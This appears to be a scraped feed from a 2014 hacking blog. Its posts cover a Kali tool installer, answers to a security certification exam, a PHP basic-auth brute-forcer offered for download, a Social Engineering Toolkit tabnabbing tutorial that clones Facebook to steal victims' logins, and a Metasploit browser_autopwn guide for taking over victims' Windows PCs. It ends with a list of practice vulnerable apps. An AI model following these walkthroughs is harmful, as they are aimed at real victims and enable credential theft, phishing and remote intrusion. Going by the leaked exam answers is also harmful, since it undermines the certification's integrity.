<img height="399" src="http://2.bp.blogspot.com/--Txk8nCOWPo/UyVh1RAT58I/AAAAAAAAFkE/cDN-RWsIELM/s1000/12.png" width="750" /><br />
</a><br />
<br />
And Main menu is this<br />
<br />
<a class="center" href="http://4.bp.blogspot.com/-pi1sCL9_gXc/UyVh9vdI_WI/AAAAAAAAFkM/7BUOnaRIqpM/s1600/11.png"><br />
<img height="399" src="http://4.bp.blogspot.com/-pi1sCL9_gXc/UyVh9vdI_WI/AAAAAAAAFkM/7BUOnaRIqpM/s1000/11.png" width="750" /><br />
</a><br />
<br />
Keep checking darksite.co.in for upcoming tutorial on PwnSTAR.Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-44088086305948108722014-03-15T12:33:00.001+05:302014-04-15T23:25:32.376+05:30Lazy Kali Script for Kali Linux Must have Hi all today i am going tell you about bash script that helps you in kali linux to handle many software updation in simple manner.<br />
Lazy kali is just a simple bash script that makes you feel lazy and helps in better way to Adds quite a few tools to Kali Linux.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-AhqviakW8uM/UyPxuFSgVyI/AAAAAAAAFjI/zVF1j41xq6U/s1600/lazy+kali.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-AhqviakW8uM/UyPxuFSgVyI/AAAAAAAAFjI/zVF1j41xq6U/s400/lazy+kali.png" /></a></div>Here are the list of tool that you can add using lazy kali with current version.<br />
Adds quite a few tools to Kali Linux.<br />
<li>Bleeding Edge Repos<br />
<li>AngryIP Scanner<br />
<li>Terminator<br />
<li>Xchat<br />
<li>Unicornscan<br />
<li>Nautilus Open Terminal<br />
<li>Simple-Ducky<br />
<li>Subterfuge<br />
<li>Ghost-Phisher<br />
<li>Yamas<br />
<li>PwnStar<br />
<li>Ettercap0.7.6<br />
<li>Xssf<br />
<li>Smbexec<br />
<li>Flash<br />
<li>Java<br />
<li>Easy-Creds... and more!<br />
<br />
Lazy-Kali will also update Kali, Start Metaploit Services, Start Stop And Update Open-Vas. This is the first version, script is self updating so more will be added in a short time. Will try to add requested features. <br />
<br />
You can download lazy kali from <a href="https://code.google.com/p/lazykali/downloads/detail?name=lazykali.sh&can=2&q=">this link</a><br />
You will get the file with the name <b>lazykali.sh</b>. Now to install follow the screen shot.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-XBQBhf67FPc/UyP5nqjJhvI/AAAAAAAAFjY/RPstxtv58IM/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-XBQBhf67FPc/UyP5nqjJhvI/AAAAAAAAFjY/RPstxtv58IM/s400/4.png" /></a></div>if the script is not installed it may prompt you to install. Type Y to install the script.<br />
Once that is done you will see manu as shown in first screen shot.<br />
<br />
there you go you can select update kali Option 1 to update your kali linux.<br />
just like if you select option 5 (sniffing/spoofing) then you can see this menu.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-EsrlfMfRpNw/UyP67NFnCII/AAAAAAAAFjk/kFoa-pCMhsA/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-EsrlfMfRpNw/UyP67NFnCII/AAAAAAAAFjk/kFoa-pCMhsA/s400/2.png" /></a></div>if you select installing extra options 6 then this screen will show up.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-2U_E6BCd6Tg/UyP7IaU4IJI/AAAAAAAAFjs/bqtBHrR5a2g/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-2U_E6BCd6Tg/UyP7IaU4IJI/AAAAAAAAFjs/bqtBHrR5a2g/s400/1.png" /></a></div>Hope this will make you lazy on kali and have fun.<br />
Thanks for reading .Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-64210059020475263692014-03-05T23:43:00.000+05:302018-10-09T15:24:14.814+05:30Innobuzz CISE (Certified Information Security Expert) Exam Question Answer<div dir="ltr" style="text-align: left;" trbidi="on">
Hi Everyone Here is the post that most people google for.<br />
funnily i have given cise exam for multiple time for some of my friends. so lets not waste the time<br />
directly go into question .so i am skipping the register for exam and other bla bla bla part.<br />
<br />
Note: This Q/A we published after taking permission from Innobuzz and these questions are changed now.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-6zovWZYRcgo/UxdpH6vbYsI/AAAAAAAAFeI/vwOG2MrOqRM/s1600/cise.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-6zovWZYRcgo/UxdpH6vbYsI/AAAAAAAAFeI/vwOG2MrOqRM/s400/cise.jpg" /></a></div>
come to question and answer.<br />
1)Enter Administrative Contact Mail Address of innobuzz.in<br />
<br />
Asnwer:- Its very simple go to who.is and search for innobuzz.in and the answer will show you on search result.<br />
that is <b>innobuzz.control@gmail.com</b> <br />
<br />
2)Enter Domain name Starting with "S" hosted on same server innobuzz.in.<br />
<br />
Asnwer:- Again this can be solve via online easily <a href="http://www.yougetsignal.com/tools/web-sites-on-web-server/">Yougetsignal</a> and the answer is <b>www.secfence.com</b> .<br />
<br />
3)Enter Exact name of service running on port number 21 of innobuzz.in.<br />
<br />
Answer :- This Answer can easily Find out by using nmap.if u are on backtrack then you can use this simple command on terminal.<br />
<br />
<b>nmap -A innobuzz.in</b> and you will see the answer on scan result.<br />
<br />
the answer is <b>Pure-FTPd</b><br />
<br />
4)Here is one of the funny question The Password is being sent on http header. catch it and enter bewlow.<br />
<br />
Answer:-You can easily see by using mozilla live header addons.<br />
<br />
And The Answer is <b>ADMIN@123</b>.<br />
<br />
5) Here comes the final one again good one.Enter the password.<br />
<br />
Answer:-you just need to view source(ctrl+u) you will see some thing like this on green color "cDQ1c3dyMGQyIyRAIQ=="<br />
<br />
now this is a base 64 encodeed one you can easily decode with some online site like <a href="http://www.base64decode.org/">http://www.base64decode.org</a>.<br />
<br />
The answer will be <b>p45swr0d2#$@!</b><br />
<br />
i believe this exam was easy yes. after submitting answer you will get a code which you need to submit at innobuzz portal.<br />
after which you will get CISE certificate.<br />
<br />
Please Do comment if you have faced have questions also you can add new questions if you get during exam .<br />
Find screen shot here<br />
<a href="http://3.bp.blogspot.com/-8OpSKClELxs/UxdnnOzkH5I/AAAAAAAAFdc/B0MblaGUVaY/s1600/1.jpg" imageanchor="1"><img border="0" src="https://3.bp.blogspot.com/-8OpSKClELxs/UxdnnOzkH5I/AAAAAAAAFdc/B0MblaGUVaY/s320/1.jpg" /></a><br />
<a href="http://2.bp.blogspot.com/-j_fTSMHG1zQ/UxdnyGJl-HI/AAAAAAAAFdk/OkkfHu9itto/s1600/2.jpg" imageanchor="1"><img border="0" src="https://2.bp.blogspot.com/-j_fTSMHG1zQ/UxdnyGJl-HI/AAAAAAAAFdk/OkkfHu9itto/s320/2.jpg" /></a><br />
<a href="http://2.bp.blogspot.com/-CZOdWFX-N5c/Uxdn4CrUIdI/AAAAAAAAFds/NL725hUTgJI/s1600/3.jpg" imageanchor="1"><img border="0" src="https://2.bp.blogspot.com/-CZOdWFX-N5c/Uxdn4CrUIdI/AAAAAAAAFds/NL725hUTgJI/s320/3.jpg" /></a><br />
<a href="http://3.bp.blogspot.com/-VI7GgL26kDo/UxdoAY5kO1I/AAAAAAAAFd0/JOv4GWKvDTk/s1600/4.jpg" imageanchor="1"><img border="0" src="https://3.bp.blogspot.com/-VI7GgL26kDo/UxdoAY5kO1I/AAAAAAAAFd0/JOv4GWKvDTk/s320/4.jpg" /></a><br />
<a href="http://4.bp.blogspot.com/-KEDFd6_n1NY/UxdoFjOYVaI/AAAAAAAAFd8/tqkwtG10X10/s1600/5Ans.jpg" imageanchor="1"><img border="0" src="https://4.bp.blogspot.com/-KEDFd6_n1NY/UxdoFjOYVaI/AAAAAAAAFd8/tqkwtG10X10/s320/5Ans.jpg" /></a><br />
<br />
Please Do comment if you like this or want more post on any topic.<br />
<br />
Thanks for visiting.<br />
<br />
<br />
<br /></div>
Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com3tag:blogger.com,1999:blog-4060165147151547772.post-31119169810161390192014-02-27T23:51:00.001+05:302014-02-27T23:59:07.953+05:30PHP Script For Cracking http Basic Authentication hi in this post i am again sharing article of one of my very nice friend <a href="http://www.mannulinux.org/">manish</a> this php shell helps in cracking http basic authentication password cracking.now lets come to the real topic what exactly basic auth.<br />
<div class="center"><a href="http://2.bp.blogspot.com/-UcbDUxGNCkk/Uw8SPks32YI/AAAAAAAABVk/NLxGO7qvukU/s1600/http4.png"><br />
<img height="399" src="http://2.bp.blogspot.com/-UcbDUxGNCkk/Uw8SPks32YI/AAAAAAAABVk/NLxGO7qvukU/s800/http4.png" width="620" /><br />
</a><br />
<span>Http Basic Auth Cracker PHP Script</span><br />
</div><br />
so in order to perform HTTP transaction(request- response), basic access authentication is a method for an HTTP user agent to provide a user name and password when making a request.after providing correct user id and password when it is asked.<br />
<br />
<div class="center"><a href="http://2.bp.blogspot.com/-C7N73qzKy3Q/Uw8P6V3NnqI/AAAAAAAABVY/peLINVqlJnY/s1600/http3.png"><br />
<img height="199" src="http://2.bp.blogspot.com/-C7N73qzKy3Q/Uw8P6V3NnqI/AAAAAAAABVY/peLINVqlJnY/s600/http3.png" width="320" /><br />
</a><br />
<span>Basic Auth Prompt</span><br />
</div><br />
it will allow you to do the http request.so our objective here is how we can break it or get the correct user id and password <br />
so we can do it with the help of php script and brute force attack.<br />
you can brute force any panel which is using basic authentication using this script <br />
<br />
<a href="http://www.mediafire.com/download/3fa25np8nmflmxd/http.php"><br />
download link here</a><br />
<br />
Procedure is very simple<br />
<br />
you need to supply link where htaccess is implemented , username list and password list <br />
<br />
<div class="center"><a href="http://2.bp.blogspot.com/-n7lBBFjsLl4/Uw8US4rhaQI/AAAAAAAABVw/yHnSSasIifM/s1600/http.png"><br />
<img height="399" src="http://2.bp.blogspot.com/-n7lBBFjsLl4/Uw8US4rhaQI/AAAAAAAABVw/yHnSSasIifM/s1600/http.png" width="620" /><br />
</a><br />
<span>provide possible username and password list</span><br />
</div><br />
and click "<b>lets hex this shit</b>" button<br />
if password is weak or in your password list, you will get success message like this<br />
<br />
<div class="center"><a href="http://3.bp.blogspot.com/-0MMeMxEs0SI/Uw8VoNRWsQI/AAAAAAAABV8/DZuBYfIEmVE/s1600/http2.png"><br />
<img height="399" src="http://3.bp.blogspot.com/-0MMeMxEs0SI/Uw8VoNRWsQI/AAAAAAAABV8/DZuBYfIEmVE/s1600/http2.png" width="620" /><br />
</a><br />
<span>Cracked Successfully :)</span><br />
</div><br />
enjoy :)<br />
with love from Team IndiShell<br />
if you have any problem regarding this script , you can message manish on facebook<br />
http://facebook.com/manish1046<br />
<br />
it work very nice you should definitely give a try :) if u encounter http basic auth somewhere :).Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com1tag:blogger.com,1999:blog-4060165147151547772.post-57940503288105256062014-02-23T00:50:00.001+05:302014-02-23T00:52:42.934+05:30Tabnabbing Attack with social Engineering toolkit on Backtrack | kaliHi everyone here is the post that basically explain about very fundamental attack known to be tab nabbing attack.the attack is very simple again you sent an link to the victim he/she click on it and redirected to your desired login page which looks like original and the after putting his/her credentials you get that in no time .<br />
so lets do this with social engineering toolkit as here more social engineering trick is very necessary .<br />
So before doing all do check your own BT/Kali System IP address by typing <b>ifconfig</b> command.<br />
then Open Your Backtrack terminal and Type <b>cd /pentest/exploits/set</b><br />
Now Open Social Engineering Toolkit (SET) <b>./set</b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-OrLz771w7m0/Uwj2LNVSg-I/AAAAAAAAFb8/Q4DaQrjFpok/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-OrLz771w7m0/Uwj2LNVSg-I/AAAAAAAAFb8/Q4DaQrjFpok/s720/1.png" /></a></div>after that choose social engineering attack that is option 1 and then choose option 2, <b>“Website Attack Vectors”</b>.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-h67ysEQZmVM/Uwj2gXJGqBI/AAAAAAAAFcE/ZCIdCA99EGw/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-h67ysEQZmVM/Uwj2gXJGqBI/AAAAAAAAFcE/ZCIdCA99EGw/s520/2.png" /></a></div>a list of options will be populated you have to select option<b> 4 “Tabnabbing Attack Method”</b>.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-TovGFgxoc3M/Uwj21B9SDJI/AAAAAAAAFcM/JO9CPE-Jlh8/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-TovGFgxoc3M/Uwj21B9SDJI/AAAAAAAAFcM/JO9CPE-Jlh8/s520/3.png" /></a></div>next choose option 2 <b>“Site Cloner”</b>.<br />
it will ask for your system ip which you can give that you got from ifconfig (<b>your backtrack machine ip</b>)<br />
Then Enter the URL of the site you want to clone. In this case<b> http://www.facebook.com </b>and hit enter. SET will clone up the web site. And press return to continue.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-mqxE0JTA7LY/Uwj3Sk294kI/AAAAAAAAFcU/YlX71xrRqG0/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-mqxE0JTA7LY/Uwj3Sk294kI/AAAAAAAAFcU/YlX71xrRqG0/s520/5.png" /></a></div>Now convert your URL into Google URL using goo.gl and send this link address to your victim via Email or Chat or any other social way you can make it reach to victim.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-RPtCEUjvmj4/Uwj36JshFlI/AAAAAAAAFcc/xYxd8F0Qs_E/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-RPtCEUjvmj4/Uwj36JshFlI/AAAAAAAAFcc/xYxd8F0Qs_E/s520/7.png" /></a></div>When victim open in their browser it should be a message that the page is still loading. so victim start to open another tab. As soon as victim open new tab, our fake website start working. That script will redirect the victim to the phishing page your derived.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-pa5etwWQpd0/Uwj4Bn_xUaI/AAAAAAAAFck/GLsdp3-6XwE/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-pa5etwWQpd0/Uwj4Bn_xUaI/AAAAAAAAFck/GLsdp3-6XwE/s520/8.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-3HqB3FjBgAA/Uwj4Jd2bcOI/AAAAAAAAFcs/p8oOqvt62YY/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-3HqB3FjBgAA/Uwj4Jd2bcOI/AAAAAAAAFcs/p8oOqvt62YY/s320/9.png" /></a></div>here yyou goes these are the user id and password of the victim :D.<br />
be safe keep hacking :).Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-61503162524084594232014-02-09T12:48:00.001+05:302014-02-09T12:51:03.067+05:30Hack Remote Windows 7 | XP PC With Metasploit (Browser Auto Pwn Vulnerability)Hi all this is one of the popular attack know as browser auto pwn Vulnerability which we are going to use in this tutorial.<br />
This is a simple vulnerability that allow attacker to hack to remote machine just by a single click by the victim.<br />
<font color="green"><b>-::Using Metasploit::-</b></font><br />
in metasploit there is a module known as browser autopwn.The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits.When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.<br />
<br />
follow these steps to carry out the attack.<br />
open you backtrack/kali terminal make sure metasploit is there (which is present by default :D ).<br />
type #<b>msfconsole</b> on terminal<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-5MBpkpP1Nw0/Uvcpwv91-RI/AAAAAAAAFbQ/PotAl7VsMqQ/s1600/msfconsole.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="msfconsole" src="http://2.bp.blogspot.com/-5MBpkpP1Nw0/Uvcpwv91-RI/AAAAAAAAFbQ/PotAl7VsMqQ/s520/msfconsole.png" /></a></div><br />
Now follow these steps as show in image <br />
use the browser_autopwn module<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/--ZyLQL9wlbI/UvcqU1E2iEI/AAAAAAAAFbY/hR303hVixT4/s1600/use+auxiliry.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="use browser auto pwn" src="http://1.bp.blogspot.com/--ZyLQL9wlbI/UvcqU1E2iEI/AAAAAAAAFbY/hR303hVixT4/s920/use+auxiliry.png" height=400 width=580 /></a></div><br />
We have set up the LHOST with our IP address,the port to be 4445 and the URIPATH with / in order to prevent metasploit to set up random URL’s.now you will see below image.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-_Cy3Iy0r8uw/Uvcqvc1ZjCI/AAAAAAAAFbg/q1ggmlnOOAM/s1600/server+started.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="server started with 16 module" src="http://4.bp.blogspot.com/-_Cy3Iy0r8uw/Uvcqvc1ZjCI/AAAAAAAAFbg/q1ggmlnOOAM/s320/server+started.png" /></a></div>Server started with 16 module.<br />
next we need to send the link to victim (like here http://192.168.205.131:8080/).as soon as the victim open the link its all done.<br />
we have the meterpreter shell control in out hand you can do various activity you wish with meterpreter shell functionality.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-IvgilcQ_2FM/UvcrlqzQseI/AAAAAAAAFbo/KRby12yhkhI/s1600/hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-IvgilcQ_2FM/UvcrlqzQseI/AAAAAAAAFbo/KRby12yhkhI/s920/hacked.png" /></a></div><br />
Enjoy the hack of your victim machine have fun .<br />
Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-11933306552120052962014-02-01T14:33:00.000+05:302014-02-01T14:38:07.734+05:30Downloadable Vulnerable Web Application For Practice Hacking Skills:<b>Part2</b>:<br />
In part1 of this post i have listed <a href="http://www.darksite.co.in/2014/01/online-sites-for-practice-hacking-skills.html">Online | Live Sites For Practice Web Application Hacking Skills</a> Now here i will give you links for downloading iso/zip file which you can install and enjoy in best possible way.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-qK2VuJKEeLY/Uuy4WkeQPAI/AAAAAAAAFaE/U3oQ-BCGEbw/s1600/offline+hacking.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Hacking practice vulnerable" src="http://3.bp.blogspot.com/-qK2VuJKEeLY/Uuy4WkeQPAI/AAAAAAAAFaE/U3oQ-BCGEbw/s1600/offline+hacking.jpg" /></a></div>with these vulnerable web applications you can test your web hacking knowledge, pen-testing tools, skills, and kung-fu on, with an added bonus... without going to jail :) The vulnerable web applications have been classified in two categories: offline, VMs/ISOs.<br />
The following list references downloadable vulnerable web applications to play with that can be installed on a standard operating system (Linux, Windows, Mac OS X, etc) using a standard web platform (Apache/PHP, Tomcat/Java, IIS/.NET, etc).i am sure this will sharp your hacking skill,take these as a challenge and i am sure this will be a boost for you.<br />
<font color="green"><h2>List of offline VM/Isos For Practicing Hacking Skills </h2></font><br />
<li>The <b>BodgeIt Store</b> (Java): <a href="http://code.google.com/p/bodgeit/">http://code.google.com/p/bodgeit/</a> (<a href="http://code.google.com/p/bodgeit/downloads/list">download</a>)</li><br />
<br />
<li>OWASP <b>Bricks</b> (PHP): <a href="http://sechow.com/bricks/index.html">http://sechow.com/bricks/index.html</a> (<a href="http://sechow.com/bricks/download.html">download</a> & <a href="http://sechow.com/bricks/docs/">docs</a>)</li><br />
<br />
<li>The <b>ButterFly Security</b> Project (PHP): <a href="http://sourceforge.net/projects/thebutterflytmp/">http://sourceforge.net/projects/thebutterflytmp/</a> (<a href="http://sourceforge.net/projects/thebutterflytmp/files/">download</a>)</li><br />
<br />
<li><b>bWAPP</b> - an extremely buggy web application! (PHP): <a href="http://www.itsecgames.com/">http://www.itsecgames.com</a> (<a href="http://sourceforge.net/projects/bwapp/files/">download</a>) (<a href="http://itsecgames.blogspot.be/2013/01/bwapp-installation.html">docs</a>)</li><br />
<br />
<li>Damn Vulnerable Web Application - <b>DVWA</b> (PHP): <a href="http://www.dvwa.co.uk/">http://www.dvwa.co.uk</a> (<a href="http://code.google.com/p/dvwa/downloads/list">download</a>) </li><br />
<br />
<li>Damn Vulnerable Web Services - <b>DVWS</b> (PHP): <a href="http://dvws.secureideas.net/">http://dvws.secureideas.net</a> (<a href="http://dvws.secureideas.net/downloads/files/dvws.tgz">download</a>)</li><br />
<br />
<li>OWASP <b>Hackademic Challenges</b> Project (PHP): <a href="https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project">https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project</a> (<a href="https://code.google.com/p/owasp-hackademic-challenges/">download</a>)</li><br />
<br />
<li>Google <b>Gruyere</b> (Python): <a href="http://google-gruyere.appspot.com/">http://google-gruyere.appspot.com</a> (<a href="http://google-gruyere.appspot.com/gruyere-code.zip">download</a>)</li><br />
<br />
<li><b>Hacme Bank</b> (.NET): <a href="http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx">http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx</a> (<a href="http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacme-bank.aspx">download</a>)</li><br />
<br />
<li><b>Hacme Books</b> (Java): <a href="http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx">http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx</a> (<a href="http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmebooks.aspx">download</a>)</li><br />
<br />
<li><b>Hacme Casino</b> (Ruby on Rails): <a href="http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx">http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx</a> (<a href="http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacme-casino.aspx">download</a>)</li><br />
<br />
<li><b>Hacme Shipping</b> (ColdFusion): <a href="http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx">http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx</a> (<a href="http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmeshipping.aspx">download</a>)</li><br />
<br />
<li><b>Hacme Travel</b> (C++): <a href="http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx">http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx</a> (<a href="http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmetravel.aspx">download</a>)</li><br />
<br />
<li>OWASP <b>Insecure Web App</b> Project (Java): <a href="https://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project">https://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project</a> (<a href="http://sourceforge.net/projects/insecurewebapp/files/">download</a> - <i>orphaned</i>)</li><br />
<br />
<li><b>Mutillidae</b> (PHP): <a href="http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10">http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10</a> (<a href="http://www.irongeek.com/mutillidae/">download</a>)</li><br />
<br />
<li>OWASP <b>.NET Goat</b> (C#): <a href="https://owasp.codeplex.com/">https://owasp.codeplex.com</a> (<a href="https://owasp.codeplex.com/SourceControl/list/changesets#">download</a>)</li><br />
<br />
<li><b>Peruggia</b> (PHP): <a href="http://peruggia.sourceforge.net/">http://peruggia.sourceforge.net</a> (<a href="http://sourceforge.net/projects/peruggia/files/">download</a>)</li><br />
<br />
<li><b>Puzzlemall</b> (Java): <a href="https://code.google.com/p/puzzlemall/">https://code.google.com/p/puzzlemall/</a> (<a href="https://code.google.com/p/puzzlemall/downloads/list">download</a>) (<a href="https://code.google.com/p/puzzlemall/downloads/list">docs</a>)</li><br />
<br />
<li>Stanford <b>Securibench</b> (Java) & <a href="http://suif.stanford.edu/~livshits/work/securibench-micro/">Micro</a>: <a href="http://suif.stanford.edu/~livshits/securibench/">http://suif.stanford.edu/~livshits/securibench/</a> (<a href="http://suif.stanford.edu/~livshits/securibench/download.html">download</a>)</li><br />
<br />
<li><b>SQLI-labs</b> (PHP): <a href="https://github.com/Audi-1/sqli-labs">https://github.com/Audi-1/sqli-labs</a> (<a href="https://github.com/Audi-1/sqli-labs/archive/master.zip">download</a>) (<a href="http://dummy2dummies.blogspot.com/">blog</a>)</li><br />
<br />
<li><b>SQLol</b> (PHP): <a href="https://github.com/SpiderLabs/SQLol">https://github.com/SpiderLabs/SQLol</a> (<a href="https://github.com/SpiderLabs/SQLol/archive/master.zip">download</a>)</li><br />
<br />
<li>OWASP <b>Vicnum</b> Project (Perl & PHP): <a href="https://www.owasp.org/index.php/Category:OWASP_Vicnum_Project">https://www.owasp.org/index.php/Category:OWASP_Vicnum_Project</a> (<a href="http://sourceforge.net/projects/vicnum/files/">download</a>)</li><br />
<br />
<li><b>VulnApp</b> (.NET): <a href="http://www.nth-dimension.org.uk/blog.php?id=88">http://www.nth-dimension.org.uk/blog.php?id=88</a> (<a href="http://projects.nth-dimension.org.uk/dir?d=VulnApp">CVS download</a> & <a href="http://projects.nth-dimension.org.uk/rptview?rn=6">vulns</a>)</li><br />
<br />
<li><b>WackoPicko</b> (PHP): <a href="https://github.com/adamdoupe/WackoPicko">https://github.com/adamdoupe/WackoPicko</a> (<a href="https://github.com/adamdoupe/WackoPicko/zipball/master">download</a>) (<a href="http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf">whitepaper</a>)</li><br />
<br />
<li>OWASP <b>WebGoat</b> (Java): <a href="https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project">https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project</a> (<a href="http://code.google.com/p/webgoat/downloads/list">download</a>) (<a href="https://www.owasp.org/index.php/WebGoat_User_and_Install_Guide_Table_of_Contents">guide</a>)</li><br />
<br />
<li>OWASP ZAP <b>WAVE</b> - Web Application Vulnerability Examples (Java): <a href="http://code.google.com/p/zaproxy/downloads/list">http://code.google.com/p/zaproxy/downloads/list</a></li><br />
<br />
<li><b>Wavsep</b> - Web Application Vulnerability Scanner Evaluation Project (Java): <a href="https://code.google.com/p/wavsep/">https://code.google.com/p/wavsep/</a> (<a href="https://code.google.com/p/wavsep/downloads/list">download</a>) (<a href="https://code.google.com/p/wavsep/downloads/list">docs</a>)</li><br />
<br />
<li><b>WIVET</b> - Web Input Vector Extractor Teaser: <a href="https://code.google.com/p/wivet/">https://code.google.com/p/wivet/</a> (<a href="http://www.webguvenligi.org/projeler/wivet">download</a>) (<a href="https://code.google.com/p/wivet/downloads/list?can=1&q=">tests</a>)</li><br />
<br />
<font color="blue"><h2>Virtual Machines (VMs) or ISO images</h2></font><br />
The following list references pre-installed and ready to use virtual machines (VMs) or ISO images that contain one or multiple vulnerable web applications to play with.<br />
<li><b>BadStore</b> (ISO): <a href="http://www.badstore.net/">http://www.badstore.net</a> (<a href="http://www.badstore.net/register.htm">download</a> - registration required)</li><br />
<br />
<li><b>Bee-Box</b> (bWAPP VMware): <a href="http://sourceforge.net/projects/bwapp/files/bee-box/">http://sourceforge.net/projects/bwapp/files/bee-box/</a></li><br />
<br />
<li>OWASP <b>BWA</b> - Broken Web Applications Project (VMware - <a href="http://code.google.com/p/owaspbwa/wiki/ProjectSummary">list</a>): <a href="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project">https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project</a> (<a href="http://code.google.com/p/owaspbwa/wiki/Downloads">download</a>)</li><br />
<br />
<li><b>Drunk Admin Web Hacking Challenge</b> (VMware): <a href="https://bechtsoudis.com/work-stuff/challenges/drunk-admin-web-hacking-challenge/">https://bechtsoudis.com/work-stuff/challenges/drunk-admin-web-hacking-challenge/</a> (<a href="http://bechtsoudis.com/data/challenges/drunk_admin_hacking_challenge.zip">download</a>) </li><br />
<br />
<li><b>Exploit.co.il</b> Vuln Web App (VMware): <a href="http://exploit.co.il/projects/vuln-web-app/">http://exploit.co.il/projects/vuln-web-app/</a> (<a href="http://sourceforge.net/projects/exploitcoilvuln/files/">download</a>)</li><br />
<br />
<li><b>GameOver</b> (VMware): <a href="http://sourceforge.net/projects/null-gameover/">http://sourceforge.net/projects/null-gameover/</a> (<a href="http://sourceforge.net/projects/null-gameover/files/">download</a>)</li><br />
<br />
